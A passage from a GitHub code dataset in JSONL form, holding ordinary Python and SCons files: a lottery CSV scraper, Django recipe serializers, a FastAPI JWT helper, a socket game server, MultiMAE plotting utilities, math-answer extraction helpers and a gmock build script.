Statements/Additional/more_7_exer_flower_shop.py","file_name":"more_7_exer_flower_shop.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25428098378","text":"#!/usr/bin/python3\n\nimport re\n\n\ndef main():\n project = 0\n promise = 0\n lines = open('wap.txt', 'r')\n for line in lines:\n match = re.search('pro(ject|mise)', line)\n if match:\n group = match.group()\n if group == 'project':\n project += 1\n else:\n promise += 1\n print(\"Promise: {} | Project: {}\".format(promise, project), end='\\t')\n\n\nif __name__ == \"__main__\": main()","repo_name":"tahmid-tanzim/problem-solving","sub_path":"regular-expression.py","file_name":"regular-expression.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"13224090236","text":"# coding: utf-8\n\nfrom loto_pg import db, public_site\n\nimport sys\n\n# url = 'https://www.mizuhobank.co.jp/retail/takarakuji/loto/loto6/index.html'\nurl = 'https://www.mizuhobank.co.jp/retail/takarakuji/loto/loto6/csv/A1021264.CSV'\nurl = 'https://www.mizuhobank.co.jp/retail/takarakuji/loto/loto6/csv/A1021414.CSV?1568515735489'\n\ncheck_url = 'https://www.mizuhobank.co.jp/retail/takarakuji/loto/loto6/csv/loto6.csv'\n\nbase_url = 'https://www.mizuhobank.co.jp/retail/takarakuji/loto/loto6/csv/A102'\n\nargs = sys.argv\n\nsite_loto = public_site.Loto()\n# みずほ銀行からCSVを取得して最新の回数を設定\nsite_loto.set_max_time(check_url, \"A52\")\nprint(site_loto.max_time)\n\n# postgresqlの最新の回数を取得\ndb_loto = db.Loto(\"lotteries\")\nprint(db_loto.max_time)\n\nif len(args) == 2:\n start = int(args[1])\n end = start + 1\nelif len(args) > 2:\n start = int(args[1])\n end = int(args[2])\nelse:\n start = db_loto.max_time + 1\n end = site_loto.max_time + 1\n\nprint(\"start \" + str(start) + \" end \" + str(end))\n\n# for idx in range(db_loto.max_time+1, site_loto.max_time+1):\nfor idx in range(start, end):\n num = '%04d' % idx\n\n # self.opener.addheaders = [('User-Agent',\n # 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n url = base_url + num + \".CSV\"\n\n site_loto.parse(url, idx)\n\n if site_loto.data.times == 0:\n continue\n\n db_loto.export(site_loto.data)\n #print(\"data one_unit \" + str(site_loto.data.one_amount))\n","repo_name":"JuichiHirao/LotoScraping","sub_path":"loto_pg/six_csv.py","file_name":"six_csv.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74183803754","text":"from api.fields import Base64ImageField\nfrom rest_framework.serializers import (\n IntegerField,\n ModelSerializer,\n PrimaryKeyRelatedField,\n ReadOnlyField,\n Serializer,\n SerializerMethodField,\n)\n\nfrom core.validators import (\n validate_ingredients,\n validate_tags,\n validate_time,\n)\nfrom recipes.models import (\n Favorite,\n Ingredient,\n IngredientAmount,\n Recipe,\n Tag,\n ShoppingCart,\n)\nfrom users.serializers import CustomUserSerializer, ShortRecipeSerializer\n\n\nclass TagsSerializer(ModelSerializer):\n \"\"\"Сериализатор для вывода тегов.\"\"\"\n class Meta:\n model = Tag\n fields = '__all__'\n read_only_fields = ('__all__', )\n\n\nclass IngredientSerializer(ModelSerializer):\n \"\"\"Сериализатор для вывода ингридиентов.\"\"\"\n class Meta:\n model = Ingredient\n fields = '__all__'\n read_only_fields = ('__all__', )\n\n\nclass IngredientAmountSerializer(ModelSerializer):\n \"\"\"Сериализатор для вывода количества ингредиентов.\"\"\"\n id = ReadOnlyField(source='ingredient.id')\n name = ReadOnlyField(source='ingredient.name')\n measurement_unit = ReadOnlyField(\n source='ingredient.measurement_unit'\n )\n\n class Meta:\n model = IngredientAmount\n fields = ('id', 'name', 'measurement_unit', 'amount')\n\n\nclass AddIngredientSerializer(Serializer):\n \"\"\"Сериализатор для добавления ингредиентов.\"\"\"\n id = PrimaryKeyRelatedField(queryset=Ingredient.objects.all())\n amount = IntegerField()\n\n\nclass RecipeGetSerializer(ModelSerializer):\n \"\"\"Сериализатор для отображения рецептов.\"\"\"\n author = CustomUserSerializer(read_only=True)\n ingredients = SerializerMethodField(read_only=True)\n tags = TagsSerializer(many=True, read_only=True)\n image = Base64ImageField()\n is_favorited = SerializerMethodField()\n is_in_shopping_cart = SerializerMethodField()\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'tags',\n 'author',\n 'ingredients',\n 'is_favorited',\n 'is_in_shopping_cart',\n 'name',\n 'image',\n 'text',\n 'cooking_time',\n )\n read_only_fields = ('is_favorited', 'is_in_shopping_cart')\n\n def get_ingredients(self, obj):\n \"\"\"Получаем все ингридиенты рецепта.\"\"\"\n queryset = IngredientAmount.objects.filter(recipe=obj).all()\n return IngredientAmountSerializer(queryset, many=True).data\n\n def get_presence(self, model, obj):\n user = self.context.get('request').user\n if user.is_anonymous:\n return False\n return model.objects.filter(user=user, recipe=obj).exists()\n\n def get_is_favorited(self, obj):\n \"\"\"Статус - рецепт в избранном или нет.\"\"\"\n return self.get_presence(Favorite, obj)\n\n def get_is_in_shopping_cart(self, obj):\n \"\"\"Статус - рецепт в списке покупок или нет.\"\"\"\n return self.get_presence(ShoppingCart, obj)\n\n\nclass RecipeChangeSerializer(ModelSerializer):\n \"\"\"Сериализатор для добавления рецепта.\"\"\"\n tags = PrimaryKeyRelatedField(\n queryset=Tag.objects.all(), many=True,\n )\n ingredients = AddIngredientSerializer(many=True)\n image = Base64ImageField()\n\n class Meta:\n model = Recipe\n fields = (\n 'ingredients',\n 'tags',\n 'image',\n 'name',\n 'text',\n 'cooking_time',\n )\n\n def add_ingredients(self, ingredients_list, recipe):\n \"\"\"Создание уникальных записей: ингредиент - рецепт - количество.\"\"\"\n IngredientAmount.objects.bulk_create([\n IngredientAmount(\n recipe=recipe,\n amount=ingredient.get('amount'),\n ingredient=ingredient.get('id')\n ) for ingredient in ingredients_list\n ])\n\n def validate(self, data):\n validate_tags(self.initial_data.get('tags')),\n validate_ingredients(\n self.initial_data.get('ingredients')\n )\n validate_time(\n self.initial_data.get('cooking_time')\n )\n return data\n\n def create_tags(self, data, recipe):\n \"\"\"Отправка на валидацию и создание тэгов у рецепта.\"\"\"\n for tag in data:\n recipe.tags.add(tag)\n\n def create(self, validated_data):\n author = self.context.get('request').user\n tags = validated_data.pop('tags')\n ingredients = validated_data.pop('ingredients')\n recipe = Recipe.objects.create(author=author, **validated_data)\n self.create_tags(tags, recipe)\n self.add_ingredients(ingredients, recipe)\n return recipe\n\n def to_representation(self, instance):\n request = self.context.get('request')\n context = {'request': request}\n return RecipeGetSerializer(instance, context=context).data\n\n def update(self, instance, validated_data):\n instance.tags.clear()\n IngredientAmount.objects.filter(recipe=instance).delete()\n self.create_tags(validated_data.pop('tags'), instance)\n self.add_ingredients(validated_data.pop('ingredients'), instance)\n return super().update(instance, validated_data)\n\n\nclass FavoriteSerializer(ModelSerializer):\n \"\"\"\n Сериализатор для списка избранного\n \"\"\"\n class Meta:\n model = Favorite\n fields = ('user', 'recipe')\n\n def to_representation(self, instance):\n request = self.context.get('request')\n context = {'request': request}\n return ShortRecipeSerializer(\n instance.recipe, context=context\n ).data\n","repo_name":"iliya12321/foodgram","sub_path":"backend/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15949974930","text":"lst = [1, 2, 3, 4, 5]\n\nprint(lst[0])\nprint(lst[1])\n\nfor item in lst:\n print(item)\n\nlst = [1, 2, 3, 4, 5]\n\niter_obj = iter(lst)\nprint(iter_obj)\n\nprint(next(iter_obj))\nprint(next(iter_obj))\n\nfor item in iter_obj:\n print(item)\n\n# print(next(iter_obj))\n# print(iter_obj.__next__())\n\nfor i in iter_obj:\n print(i)\n\n\nclass SeriesNumber:\n\n def __init__(self):\n self.num = 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n number = self.num\n self.num += 1 # i++\n return number\n\n\nseries_number = SeriesNumber()\n\nprint(series_number.__next__())\n\nfor i in series_number:\n if i == 10:\n break\n print(i)","repo_name":"Habibur-Rahman0927/1_months_Python_Crouse","sub_path":"Python All Day Work/31-05-2021 Days Work/iterator.py","file_name":"iterator.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2284702294","text":"# coding:utf-8\n\nfrom rdflib.graph import Graph\nfrom .utils import get_type\nfrom os.path import splitext\n\n\ndef convert2ttl(owl_files):\n for owl_file in owl_files:\n graph = Graph()\n graph.parse(location=owl_file, format=get_type(owl_file))\n ttl_file = splitext(owl_file)[0] + '.ttl'\n with open(ttl_file, 'wb') as fp:\n hoge = graph.serialize(format='turtle')\n fuga = hoge.encode() if isinstance(hoge, str) else hoge\n fp.write(fuga)\n print('>>>', ttl_file)\n","repo_name":"dbcls/umakaparser","sub_path":"umakaparser/scripts/services/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"11444049987","text":"\"\"\" Visualization tools for mutliMAE\"\"\"\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torchvision.transforms.functional as TF\nfrom torchvision.transforms import ToTensor\nfrom einops import rearrange\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import ImageGrid\nfrom .MultiMAE.utils.data_constants import (\n IMAGENET_DEFAULT_MEAN,\n IMAGENET_DEFAULT_STD,\n)\n\n\ndef get_masked_image(img, mask, image_size=224, patch_size=16, mask_value=0.0):\n img_token = rearrange(\n img,\n \"b c (nh ph) (nw pw) -> b (nh nw) (c ph pw)\",\n ph=patch_size,\n pw=patch_size,\n nh=image_size // patch_size,\n nw=image_size // patch_size,\n )\n img_token[mask != 0] = mask_value\n img = rearrange(\n img_token,\n \"b (nh nw) (c ph pw) -> b c (nh ph) (nw pw)\",\n ph=patch_size,\n pw=patch_size,\n nh=image_size // patch_size,\n nw=image_size // patch_size,\n )\n return img\n\n\ndef plot_semseg_gt(input_dict, ax=None, image_size=224):\n \"\"\"Simplied plotting of semseg images\n\n Args:\n input_dict (_type_): _description_\n ax (_type_, optional): _description_. Defaults to None.\n image_size (int, optional): _description_. Defaults to 224.\n \"\"\"\n semseg = F.interpolate(\n input_dict[\"semseg\"].cpu().detach().float().unsqueeze(1),\n size=(image_size, image_size),\n mode=\"nearest\",\n ).long()[0, 0]\n\n ax.imshow(semseg)\n\n\ndef plot_semseg_gt_masked(input_dict, mask, ax=None, mask_value=1.0, image_size=224):\n semseg = F.interpolate(\n input_dict[\"semseg\"].cpu().detach().float().unsqueeze(1),\n size=(image_size, image_size),\n mode=\"nearest\",\n ).long()\n masked_img = get_masked_image(\n semseg.float() / 255.0,\n mask,\n image_size=image_size,\n patch_size=16,\n mask_value=mask_value,\n )\n masked_img = masked_img[0].permute(1, 2, 0)\n ax.imshow(masked_img)\n\n\ndef plot_semseg_pred_masked(semseg_preds, semseg_gt, mask, ax=None, image_size=224):\n semseg = get_pred_with_input(\n semseg_gt.unsqueeze(1),\n semseg_preds.argmax(1).unsqueeze(1),\n mask,\n image_size=image_size // 4,\n patch_size=4,\n )\n semseg = (\n F.interpolate(semseg.float(), size=(image_size, image_size), mode=\"nearest\")[\n 0, 0\n ]\n .long()\n .cpu()\n )\n ax.imshow(semseg)\n\n\ndef denormalize(img, mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD):\n return TF.normalize(\n img.clone(), mean=[-m / s for m, s in zip(mean, std)], std=[1 / s for s in std]\n )\n\n\ndef get_pred_with_input(gt, pred, mask, image_size=224, patch_size=16):\n gt_token = rearrange(\n gt,\n \"b c (nh ph) (nw pw) -> b (nh nw) (c ph pw)\",\n ph=patch_size,\n pw=patch_size,\n nh=image_size // patch_size,\n nw=image_size // patch_size,\n )\n pred_token = rearrange(\n pred,\n \"b c (nh ph) (nw pw) -> b (nh nw) (c ph pw)\",\n ph=patch_size,\n pw=patch_size,\n nh=image_size // patch_size,\n nw=image_size // patch_size,\n )\n pred_token[mask == 0] = gt_token[mask == 0]\n img = rearrange(\n pred_token,\n \"b (nh nw) (c ph pw) -> b c (nh ph) (nw pw)\",\n ph=patch_size,\n pw=patch_size,\n nh=image_size // patch_size,\n nw=image_size // patch_size,\n )\n return img\n\n\ndef plot_predictions(input_dict, preds, masks, image_size=224):\n masked_rgb = (\n get_masked_image(\n denormalize(input_dict[\"rgb\"]),\n masks[\"rgb\"],\n image_size=image_size,\n mask_value=1.0,\n )[0]\n .permute(1, 2, 0)\n .detach()\n .cpu()\n )\n masked_depth = (\n get_masked_image(\n input_dict[\"depth\"],\n masks[\"depth\"],\n image_size=image_size,\n mask_value=np.nan,\n )[0, 0]\n .detach()\n .cpu()\n )\n\n # todo: remove this?\n pred_rgb = denormalize(preds[\"rgb\"])[0].permute(1, 2, 0).clamp(0, 1)\n pred_depth = preds[\"depth\"][0, 0].detach().cpu()\n\n pred_rgb2 = (\n get_pred_with_input(\n denormalize(input_dict[\"rgb\"]),\n denormalize(preds[\"rgb\"]).clamp(0, 1),\n masks[\"rgb\"],\n image_size=image_size,\n )[0]\n .permute(1, 2, 0)\n .detach()\n .cpu()\n )\n pred_depth2 = (\n get_pred_with_input(\n input_dict[\"depth\"], preds[\"depth\"], masks[\"depth\"], image_size=image_size\n )[0, 0]\n .detach()\n .cpu()\n )\n\n fig = plt.figure(figsize=(10, 10))\n grid = ImageGrid(fig, 111, nrows_ncols=(3, 3), axes_pad=0)\n\n grid[0].imshow(masked_rgb)\n grid[1].imshow(pred_rgb2)\n grid[2].imshow(denormalize(input_dict[\"rgb\"])[0].permute(1, 2, 0).detach().cpu())\n\n grid[3].imshow(masked_depth)\n grid[4].imshow(pred_depth2)\n grid[5].imshow(input_dict[\"depth\"][0, 0].detach().cpu())\n\n # semseg plotting\n # plot_semseg_gt_masked(\n # input_dict,\n # masks[\"semseg\"],\n # grid[6],\n # mask_value=1.0,\n # image_size=image_size,\n # )\n # plot_semseg_pred_masked(\n # preds[\"semseg\"],\n # input_dict[\"semseg\"],\n # masks[\"semseg\"],\n # grid[7],\n # image_size=image_size,\n # )\n # plot_semseg_gt(input_dict, grid[8], image_size=image_size)\n\n for ax in grid:\n ax.set_xticks([])\n ax.set_yticks([])\n\n fontsize = 16\n grid[0].set_title(\"Masked inputs\", fontsize=fontsize)\n grid[1].set_title(\"MultiMAE predictions\", fontsize=fontsize)\n grid[2].set_title(\"Original Reference\", fontsize=fontsize)\n grid[0].set_ylabel(\"RGB\", fontsize=fontsize)\n grid[3].set_ylabel(\"Depth\", fontsize=fontsize)\n\n # semseg plotting\n grid[6].set_ylabel(\"Semantic\", fontsize=fontsize)\n # todo: more efficient ways to plot images in tensor board\n # buf = io.BytesIO()\n # plt.savefig(buf, format=\"png\")\n # plt.close(fig)\n # buf.seek(0)\n\n # # decode the array into an image\n # # todo: use pillow-simd in future\n # image_grid = PIL.Image.open(buf)\n # image_grid = ToTensor()(image_grid)\n return fig\n","repo_name":"microsoft/perception-benchmark","sub_path":"models/MultiMAE/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":6211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23033917771","text":"def prod(string):\n total = 0\n price = {\n 'A':{\n 1: 35,\n 4: 100\n },\n 'B':{\n 1:65\n },\n 'C':{\n 1:50,\n 6:250\n },\n 'D':{\n 1:85\n }\n }\n count = {e:string.count(e) for e in set(string)}\n for c in sorted(count):\n for k,v in reversed(price[c].items()):\n if count[c] > k:\n total += (count[c]//int(k))*int(v)\n count[c] = count[c] - k\n else:\n total += (count[c]//int(k))*int(v)\n return total\n\n\nprint(prod('ABCADABAA'))\nprint(prod('CCCACCCC'))\nprint(prod('ABCD'))\n\n","repo_name":"Amit2197/ProgramingSolved","sub_path":"Accenture/productcode.py","file_name":"productcode.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30132612476","text":"import time\nfrom datetime import datetime\n\nfrom fastapi import HTTPException, status\nfrom jose import jwt, JWTError\nfrom database.connection import Settings\n\nsettings = Settings()\n\n\ndef create_access_token(user: str):\n payload = {\"user\": user, \"expires\": time.time() + 3600}\n\n token = jwt.encode(\n payload, settings.SECRET_KEY, algorithm=\"HS256\"\n ) # 인코딩할 대상, 페이로드 사인을 위한 키, 사인/암호화 알고리즘\n return token\n\n\ndef verify_access_token(token: str):\n try:\n data = jwt.decode(token, settings.SECRET_KEY, algorithms=[\"HS256\"])\n expire = data.get(\"expires\") # 만료 시간 존재 확인\n\n if expire is None:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"No access token supplided\",\n )\n if datetime.utcnow() > datetime.utcfromtimestamp(expire): # 만료 여부 확인\n raise HTTPException(\n status_code=status.HTTP_403_FORBIDDEN, detiail=\"Token expired!\"\n )\n return data\n\n except JWTError:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST, detail=\"Invalid token\"\n )\n","repo_name":"limstonestone/fastapi-web-tutorial","sub_path":"planner/auth/jwt_handler.py","file_name":"jwt_handler.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24781723752","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom model import clean, run_model\n\napp = Flask(__name__)\nCORS(app)\n\n\n# GET request route\n@app.route('/api/data', methods=['GET'])\ndef get_data():\n # Process GET request and return response\n data = {'message': 'Hello from the backend!'}\n return jsonify(data)\n\n# POST request route -> takes posts from frontend + user preferences & returns triggering posts only\n@app.route('/api/submit', methods=['POST'])\ndef submit_data(): \n\n submitted_data = request.json\n print(submitted_data)\n print(\"triggers :\", submitted_data['triggers'])\n print(\"threshold :\", submitted_data['threshold'])\n\n # clean posts\n cleaned_data = clean(submitted_data['data'])\n\n # get user prefs\n triggers = submitted_data['triggers']\n threshold = submitted_data['threshold']\n\n # get labels based off of post & user prefs\n probability_data = run_model(cleaned_data, triggers, threshold)\n\n # return the processed result\n return probability_data\n\nif __name__ == '__main__':\n app.run()","repo_name":"BrendaNamuh/Hide-It","sub_path":"chrome-ext/backend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26215547641","text":"# https://leetcode.com/problems/next-greater-node-in-linked-list/\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def nextLargerNodes(self, head: ListNode) -> List[int]:\n st = []\n m = {}\n ptr = head\n idx = 0\n while not ptr is None:\n while len(st) > 0 and ptr.val > st[-1][1]:\n m[st[-1][0]] = ptr.val\n st.pop()\n st.append((idx, ptr.val))\n ptr = ptr.next\n idx += 1\n\n n = idx\n res = [0 for i in range(n)]\n for k, v in m.items():\n res[k] = v\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/1001-1500/1019_next-greater-node-in-linked-list_1_AC.py","file_name":"1019_next-greater-node-in-linked-list_1_AC.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"6757464826","text":"import socket\nimport json\nimport threading\n\n\nfrom eventhandler import EventHandler\n\n\ndef new_thread(target, daemon=True, args=()):\n thread = threading.Thread(target=target, args=args, daemon=daemon)\n thread.start()\n\n\nclass Server:\n\n def __init__(self):\n\n self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n host = \"192.168.0.178\"\n port = 12345\n self.server.bind((host, port))\n self.server.listen()\n self.id_count = 0\n print(\"Server is online\")\n new_thread(self.receive, daemon=False)\n self.event = EventHandler(self)\n\n def receive(self):\n \"\"\"\n New client connections\n \"\"\"\n while True:\n client, address = self.server.accept()\n print(f\"{str(address)} connected!\")\n self.id_count += 1\n new_thread(lambda: self.handle(client))\n client.send(bytes(str(self.id_count), encoding=\"UTF-8\"))\n\n self.event.add(client, self.id_count)\n\n def handle(self, client):\n \"\"\"\n Handle connected client\n :param client: socket\n \"\"\"\n while True:\n try:\n message = json.loads(client.recv(2048).decode())\n self.event.new(client, message)\n except socket.error:\n # Disconnect\n user = self.event.remove(client)\n client.close()\n print(f\"{user} [{user.get_uid()}] disconnected!\")\n self.event.broadcast_lobby()\n self.event.broadcast_game()\n return\n\n @staticmethod\n def send(client, data):\n \"\"\"\n Send data to client\n :param client: socket client\n :param data: dict\n \"\"\"\n client.send(json.dumps(data).encode(\"UTF-8\"))\n\n\nif __name__ == '__main__':\n server = Server()\n","repo_name":"juhor00/Cardgame","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18320015473","text":"import re\nimport json\n\n\nREG_DIGITS_SINGLETON = re.compile(r\"^\\d+[./]?\\d*%?$\")\nREG_DIGITS_BEGIN = re.compile(r\"^(\\d+[./]?\\d*%?) ?(?=[\\u4e00-\\u9fa5,,。°℃$])\")\nREG_DIGITS_MIDDLE = re.compile(r\"(?<=[\\u4e00-\\u9fa5$::,=≈=->{]) ?(\\d+[./]?\\d*%?) ?(?:[\\u4e00-\\u9fa5,,。°℃$}(]|\\([^\\d\\s]|\\.$)\")\nREG_DIGITS_END = re.compile(r\"(?<=[\\u4e00-\\u9fa5$::=≈=\\->]) ?(\\d+[./]?\\d*%?)$\")\n\nREG_NORM = re.compile(r\"(?<=\\d)[, ](?=\\d)\")\nREG_LATEX_FRAC = re.compile(r'\\\\frac{([^}]+)}{([^}]+)}')\nREG_CN_FRAC = re.compile(r'(\\d+)分之(\\d+)')\n\n\ndef read_jsonl_keys(file: str, keys: list):\n \"\"\"读取jsonl文件中每一行的特定字段,以dict返回\"\"\"\n output_dict = {}\n for f in keys:\n output_dict[f] = []\n\n with open(file, 'r', encoding=\"UTF-8\") as fin:\n for line in fin:\n content = json.loads(line.strip())\n for f in keys:\n if f in content:\n output_dict[f].append(content[f])\n else:\n output_dict[f].append(None)\n return output_dict\n\n\ndef has_exception(answer: str) -> bool:\n \"\"\"用于判断模型生成的答案是否为异常\"\"\"\n\n if answer is None:\n return True\n\n if len(answer.strip()) == 0:\n return True\n\n reg_timeout = re.compile(\"(请求.*超时)|(timeout)\")\n if bool(re.search(reg_timeout, answer)):\n return True\n\n reg_error = re.compile(\"error|异常|失败|content_filter\")\n\n # 请求出现错误或异常\n if \"{\" in answer and \"}\" in answer and (bool(re.search(reg_error, answer))):\n return True\n\n return False\n\n\ndef extract_cn_fractal(line):\n \"\"\"提取输入字符串中的中文汉字分数表达,例如`五分之三`,并将其转换为基于阿拉伯数字的分数表达`3/5`\"\"\"\n\n res = re.findall(REG_CN_FRAC, line)\n if len(res) != 0:\n return [\"{}/{}\".format(b, a) for a, b in res]\n else:\n return res\n\n\ndef extract_digits_from_line(line):\n \"\"\"提取输入字符串中的所有数字\"\"\"\n\n res1 = re.findall(REG_DIGITS_BEGIN, line)\n res2 = re.findall(REG_DIGITS_MIDDLE, line)\n res3 = re.findall(REG_DIGITS_END, line)\n res4 = re.findall(REG_DIGITS_SINGLETON, line)\n res_cn_frac = extract_cn_fractal(line)\n concat = res1 + res2 + res_cn_frac + res3 + res4\n candidates = [s.strip() for s in concat]\n return [s for s in candidates if not (s.startswith(\"/\") or s.endswith(\"/\"))]\n\n\ndef extract_digits_prediction(response, truncation=\"t\", exception_regs: list = None):\n \"\"\"从模型回复中提取答案候选\"\"\"\n\n # 检测模型回复是否出现异常\n if has_exception(response, exception_regs):\n return [\"ERROR\"]\n\n response = REG_LATEX_FRAC.sub(r'\\1/\\2', response)\n response = re.sub(REG_NORM, \"\", response)\n\n candidates = []\n # 逐行提取数字\n for line in response.splitlines():\n candidates += extract_digits_from_line(line)\n\n if truncation is None:\n # 不对candidate做截断\n res = candidates\n\n elif truncation == \"t\":\n # 只考虑最末尾的两个数字作为模型可能的回答\n if len(candidates) <= 2:\n res = candidates\n else:\n res = candidates[-2:]\n\n elif truncation == \"h\":\n res = candidates[:2]\n\n elif truncation == \"ht\" or truncation == \"th\":\n if len(candidates) < 4:\n res = candidates\n else:\n res = candidates[:2] + candidates[-2:]\n else:\n raise ValueError(\"Illegal truncation argument... Only `h`, `t`, `ht` or None are supported.\")\n return list(set(res))\n\n\ndef string2num(string: str):\n \"\"\"尝试把一个string转化成一个浮点数或整数\"\"\"\n string = string.strip()\n\n if string.endswith(\"%\"):\n string = string.replace(\"%\", \"\")\n return float(string) / 100\n\n if \"/\" in string:\n parts = string.split(\"/\")\n if len(parts) != 2 or float(parts[1]) == 0.0:\n print(\"Warning: {} is illegal!\".format(string))\n return 0\n else:\n return float(parts[0]) / float(parts[1])\n\n if \".\" in string:\n return float(string)\n\n return int(string)\n\n\ndef match_digits(a, b):\n \"\"\"判断数字a和b是否近似相等\"\"\"\n\n if isinstance(a, int) and isinstance(b, int):\n return a == b\n else:\n relative_diff = abs(a - b) / (min(abs(a), abs(b)) + 1e-6)\n return relative_diff < 1e-2\n\n\ndef match_digit_response(golden, responses: list) -> bool:\n \"\"\"判断标准答案是与提取的答案候选中的某一个匹配\"\"\"\n\n if \"ERROR\" in responses:\n return False\n\n if isinstance(golden, str):\n golden = string2num(golden)\n\n for r in responses:\n try:\n num = string2num(r)\n if match_digits(golden, num):\n return True\n except ValueError:\n pass\n return False\n","repo_name":"XiaoMi/cmath","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"} +{"seq_id":"21265374671","text":"__author__ = 'joi@google.com (Joi Sigurdsson)'\n\n\nimport os\n\n############################################################\n# Environments for building the targets, sorted by name.\n\nImport('env', 'gtest_exports')\n\nGTEST_DIR = env['GTEST_DIR']\n\nGtestObject = gtest_exports['GtestObject']\nGtestBinary = gtest_exports['GtestBinary']\nGtestTest = gtest_exports['GtestTest']\n\ngtest_common_exports = SConscript(GTEST_DIR + '/scons/SConscript.common')\nEnvCreator = gtest_common_exports['EnvCreator']\n\nenv = env.Clone()\nif env['PLATFORM'] == 'win32':\n env.Append(CCFLAGS=[\n '-wd4127', # Disables warning \"conditional expression is constant\",\n # triggered by VC 8.0's own STL header .\n ])\n\n# Note: The relative paths in SConscript files are relative to the location\n# of the SConscript file itself. To make a path relative to the location of\n# the main SConstruct file, prepend the path with the # sign.\n#\n# Include paths to gtest headers are relative to either the gmock\n# directory or the 'include' subdirectory of it, and this SConscript\n# file is one directory deeper than the gmock directory.\nenv.Prepend(CPPPATH = ['..', '../include', GTEST_DIR + '/include'])\n\nenv_use_own_tuple = EnvCreator.Create(env, EnvCreator.UseOwnTuple)\nenv_with_exceptions = EnvCreator.Create(env, EnvCreator.WithExceptions)\nenv_without_rtti = EnvCreator.Create(env, EnvCreator.NoRtti)\n\n############################################################\n# Helpers for creating build targets.\n\ndef GmockStaticLibraries(build_env):\n \"\"\"Builds static libraries for gmock and gmock_main in build_env.\n\n Args:\n build_env: An environment in which to build libraries.\n\n Returns:\n A pair (gmock_library, gmock_main_library) built in the build_env\n environment.\n \"\"\"\n\n gmock_object = GtestObject(build_env, '../src/gmock-all.cc')\n gmock_main_object = GtestObject(build_env, '../src/gmock_main.cc')\n\n return (build_env.StaticLibrary(target='gmock' + build_env['OBJ_SUFFIX'],\n source=[gmock_object]),\n build_env.StaticLibrary(target='gmock_main' + build_env['OBJ_SUFFIX'],\n source=[gmock_object, gmock_main_object]))\n\n\n############################################################\n# Object and library targets.\n\ngtest = gtest_exports['gtest']\ngtest_ex = gtest_exports['gtest_ex']\ngtest_no_rtti = gtest_exports['gtest_no_rtti']\ngtest_use_own_tuple = gtest_exports['gtest_use_own_tuple']\n\n# gmock.lib to be used by most apps (if you have your own main function).\n# gmock_main.lib can be used if you just want a basic main function; it is\n# also used by some tests for Google Test itself.\ngmock, gmock_main = GmockStaticLibraries(env)\ngmock_ex, gmock_main_ex = GmockStaticLibraries(env_with_exceptions)\ngmock_no_rtti, gmock_main_no_rtti = GmockStaticLibraries(env_without_rtti)\ngmock_use_own_tuple, gmock_main_use_own_tuple = GmockStaticLibraries(\n env_use_own_tuple)\n\n# Install the libraries if needed.\nif 'LIB_OUTPUT' in env.Dictionary():\n env.Install('$LIB_OUTPUT', source=[gmock, gmock_main,\n gmock_ex, gmock_main_ex,\n gmock_no_rtti, gmock_main_no_rtti,\n gmock_use_own_tuple,\n gmock_main_use_own_tuple])\n\n#############################################################\n# Test targets using the standard environment.\nGtestTest(env, 'gmock-actions_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-cardinalities_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-generated-actions_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-generated-function-mockers_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-generated-internal-utils_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-generated-matchers_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-internal-utils_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-matchers_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-more-actions_test', [gtest, 